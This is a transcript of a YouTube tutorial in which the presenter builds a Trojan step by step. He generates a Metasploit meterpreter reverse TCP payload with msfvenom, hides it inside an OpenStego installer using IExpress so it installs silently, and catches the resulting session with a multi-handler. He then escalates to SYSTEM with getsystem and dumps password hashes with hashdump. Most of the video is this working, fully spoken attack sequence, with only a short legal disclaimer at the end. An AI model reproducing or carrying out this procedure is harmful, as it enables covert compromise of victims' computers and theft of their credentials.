Hey everybody, it is Malik again, and I want to actually do another video. I put one of these out, I don't know, a couple years ago, um, but I'm having some people tell me that it doesn't work anymore. Um, I have a new virtual build here, but I'm gonna try it out. Uh, and what I'm gonna be doing is creating a reverse TCP, uh, but wrapping it inside of a legitimate program. So it's technically a Trojan. So when the user installs the legitimate program, they see that install, but the reverse TCP installs at the same time in the background. They never see it, and they're completely unaware of it. I'm having some people tell me that they can't get it to work, and they believe this is just a virtual environment thing. Well, let me first say it's not a virtual environment thing. This now, I do it in virtual environments, yes, only because I don't feel like using physical multiple physical laptops or desktops to send packets across. Um, So if it's not working for you, there's going to be one or two possible reasons as to why. Um, and I'll get into those when we're building it, and I'll point those out. And and it's actually going to lead into another video that I will make and probably put up tomorrow morning. I just have to create my slide decks for them because I need to explain something. So the first thing we're going to do is I'm just going to write, and I can do this straight from the terminal window. I'm just going to write a reverse TCP. Now, I don't have to start Metasploit for this. I can do it with MSF Venom in one line without having to launch the MSF console, but I will have to launch the console for the listener side. So I've made my font a little bit bigger so you guys can see it. So all we're going to do is MSF Venom, and we're going to set the payload. Now that is the Windows interpreter reverse TCP. So that's the payload that we're going to write. Now I have to set my local host. This is the IP address of my Linux machine. Now that's 192.168.1.170. Local port, I'll just keep it at 4444. That's the default port. Of course, I could change that to whatever I feel like it. I'm going to tell it to output it as an executable. And then all I need to do is tell it where to go. So send it to root desktop. And we're going to call it, just so we can see it, we're going to call it payload.exe. Of course, stupid name to put it, but so we can find it. The first problem you may have is if you type any of this wrong. If your L host is not the IP address of your Linux machine, then the reverse TCP is going to fail because it can't find you. If you set a local port and that port is closed on their side, it's not going to get through. It's not going to be able to respond back through that port because it's closed. So there are a lot of things that can cause this to fail. 99% of the time, I see this fail because of a typo. People don't read the return, and I still type things wrong, and I've been typing this stuff for a very long time. You have to look at what MSF Venom or MSF Console returns back to you. If it returns back an error, then retype that line. Now, Venom, you're going to see, will return something back that seems to be an error, but I'm going to show you what is a real error and what is not, or ones you have to worry about and ones you don't. So let this thing build. It's just taking a minute. You see it's already started building it on my desktop. Now, here you go, error, invalid payload selected. Now, what did I do wrong? Well, I'm going to tell you exactly what I did wrong, and this is what I see. Now, people don't see this. They don't pay attention to this. They see this and go, oh, well, it built the payload. No, that's empty. There's nothing there. So I'm going to delete that, and I'm going to show you what I typed wrong. This is a very easy thing to type wrong. I'm going to hit my up arrow just to retype the whole line. What I typed wrong was that very first slash. Oops. Was that very first slash. It's not -p / Windows. That doesn't belong. Linux is picky. If there's a space where there shouldn't be a space, it's going to call an error. If there's a slash where there shouldn't be a slash, it's going to call an error. If you miss a switch, it's going to call an error. So pay attention to what it returns. Don't pay attention just because it dumped a file on your desktop. So this one's typed in right. It's going to come back. Now it is going to call an issue, and I'll show you what that is. Just takes it a minute. There we go. Right here. No platform was selected. Choose an MSF module platform Windows from the payload. No Arch is selected. Selecting Arch x86 from the payload. Since I did not specify a platform, which I could do in this line, or specify an architecture, x86 or x64, it defaults to Windows and 32-bit. That's okay. This is what you're looking for. Is there a file size? Well, yes, there is a file size. If this was critical, it would say final size of executable file 0 bytes, which means it's not going to work because the payload is empty. So just make sure you type it right. The other thing, again, everything I do and everything I show you guys, I use for penetration testing. I use for stress testing networks. This is going to work beautifully in an intranet environment. This is not going to work in an internet environment. If I could upload this to a website and people click on it, I'm not going to get a connection back. And if you don't understand why, then you need to take a look at networking. This right here will never allow a connection back from the internet. This is not a routable IP address. Internally, it will work all day long. Externally, it will not work. If I sent this to you in an email and you clicked it, it would not be able to find me because 500,000 people have this email address. Sorry about that. IP address. It's all about routable and non-routable IPs. And that's where natting and padding comes in. So tomorrow I'm going to do a video on natting and padding. So if you don't understand it, check out that video. It should be up sometime tomorrow. But enough with that yabba yabba. I'm going to drop this into a folder that I have that shares across all my virtuals. Okay, it's in there. Now, while I'm already in here, let me start my console, and I can start writing my listener. I'm not going to have it run yet until I build the Trojan, but I can at least get it written. It'll take a minute for the console to launch. I could have launched it over here also, of course. I got a no database support. Okay, there we go. We got in okay. Alright, so what I need to do now is use my multi-handler. So use multi-handler. I think I get away without doing that first slash first, but and I may have to come back out and reload the database because I may not be able to jump into my handler. Yep, failed to load multi-handler. In fact, let me, sometimes with 5, that's not going to work. I'm going to have to come back out and get the database to reload. There we go. It did pull it. Sometimes you can use a slash there, sometimes you can't. In MSF5, you don't need it. So I have to set my payload to the same thing that I did before. Windows, interpreter, reverse TCP. This is where, again, where you want to pay attention to what you type. When you type a line and you hit enter, it should basically echo back what you typed. If it echoes back an error, just type the line again. Set L host. Now, of course, you want to make sure this is right. 192.168.1.170. There's nothing wrong if you put in the wrong IP. It's the worst thing in the world. Again, I could correct it. If I typed it in wrong, I could just retype it. Set L port 4444. Okay. Now, when I hit enter, it's going to go into listen mode. But before I do that, I'm going to switch virtuals. I'm just going to do it on Windows 7, but it does work on Windows 10 also. I'm going to come in here. I'm going to drag off my payload. And I have OpenStego here. I've never tried to build it with OpenStego, so I need to install that on this virtual, so that's where I got it. So we want to wrap these two together. We want the person to see Stego load and install, but don't want them to see payload install. Now, while there are programs out there that are Trojan creators and are very good Trojan creators, they can even go as far as running crypto on your payload to make it harder for AVs to find. I'm just going to use IExpress. IExpress comes with Windows, and it creates what we call a self-extraction directive file. It's made by network administrators to take multiple executables, wrap them into one executable, send that packet out, and it can be all installed at one time. However, we're going to use it for something different. So we're going to tell it to create a new one, extract the files and run it, and we're going to give it a name. I'm going to call it OpenStego. I don't need it to prompt for the package, and you can actually make this look way more realistic by displaying a license. But again, we don't need that. Stego already has its setup file. Now I'm going to add the two files. Now the order that you add them doesn't matter. I'm going to add Stego, then I'm going to go back and I'm going to add the payload. It doesn't matter which one comes first. This is where it matters. My install program is going to be OpenStego. My post install is going to be payload. Keep the default installation so they can see OpenStego. I don't need a finished message. I'm going to tell it to drop it on the desktop and call it OpenStego. See, it will make an executable. I don't need to worry about hide file extractions, and only restart if needed. Now, I don't need to save the directive file, the steps. Don't need to save that. And I'm going to create the package. Depending on the size of the package, it may be stupidly quick or may take a very long time. If you do something like Wireshark, it takes a very long time. OpenStego is a quick package, and in fact, it does pull some things from the internet, so it may be a little tricky. I'm going to delete these two. I don't need them anymore. Here is my package. It's called OpenStego. Anybody who looks at it, they see it says Company Microsoft Corporation. It's not digitally signed by Microsoft, but you know, we can take a look at the details, and it does say copyright Microsoft. Okay, and they can see it's a cabinet self-extractor. Alright, so before I double click that, let's switch back over and let's start our handler. So now we're listening. Now, let's see if it works. I am going to open up the task manager. Now, unfortunately, I can't make this any bigger, but what we're going to look for over here during the setup is a file called payload dropping inside of these processes. Oops, sorry. I forget. I got to run this as administrator because... Okay, so let's keep this out of the way. The OpenStego setup. And there it is. There's the setup and OpenStego. I agree. Install. Okay, completed. Close. Look. Payload.exe. There's OpenStego, but there's payload. Now, will OpenStego run? Well, let's find out. Oh, I need Java for it. I forgot, OpenStego requires Java. So OpenStego would run. I need to install Java on here. But let's switch over, and you will see we have started it. It has sent the stage, and we now have a session. So if I do get UID, you will see we have captured the Windows 7 PC. Now, is Windows 7 vulnerable to get system? Got system. So now if I do get UID, I'm now NT authority, which means I basically am the machine. There's really nothing I can't do. I can run a hash dump, even though it's probably going to come back and scream at me that I should be using smart. It should still be able to pull the dump file. See, there you go. See, it should be running smart, but hash dump still works. There's the boot key. Now let's get the list keys. There we go. There's the hash file and the SAM. Guest account, Windows 7 account, user account, home group user account. That's a network share. That's the big one I want right there to get administrator privileges, but who cares? I'm already system anyway. So it does still work. It hid the file. Now with that being said, that it does still work, do keep in mind that such a simple command in Metasploit is going to be picked up by a lot of AVs now. So you may have to do a little bit more work to sneak it through. If they're running a heavy AV, it may, during the install of OpenStego, it may call an error message. and not allow them to install it. That may be a reason why it doesn't work. But if it doesn't call an error message and you've typed everything correctly, or if the AV doesn't kick in and it installs everything correctly, you should definitely grab a prompt. Okay? So be on the lookout for the video sometime tomorrow, understanding natting and padding, uh, which could be why if some of you guys are, and I hope you're not, but if some of you guys are trying to, put this out there to where other people can click on it, you want to get a connection back from them, that's not going to work. It's a whole lot. There's many more steps that you're going to have to perform to get that to work. And I really hope you're not doing that. Not only is it illegal, but putting your IP address out there is extremely easy to trace back by any rookie forensics investigator. They will find your IP address and they will be knocking on your door. Play around with this stuff in your virtuals all day long. Please do not do this stuff out on the internet and get in trouble. You really don't want to spend your time in prison. Laws are different in every country. I don't know what country you're in, but in the States, computer crimes are 5 to 7 years default. So don't do anything dumb. Alrighty, guys. So I appreciate it and hope this works out for you. If you have any questions, of course, drop those in the comments. If you haven't subscribed to the channel yet, please click that subscribe. We're getting close to 1,000 subscribers now. Hit the notification bell so you can see when I post new videos. And until next time, I will catch you guys later.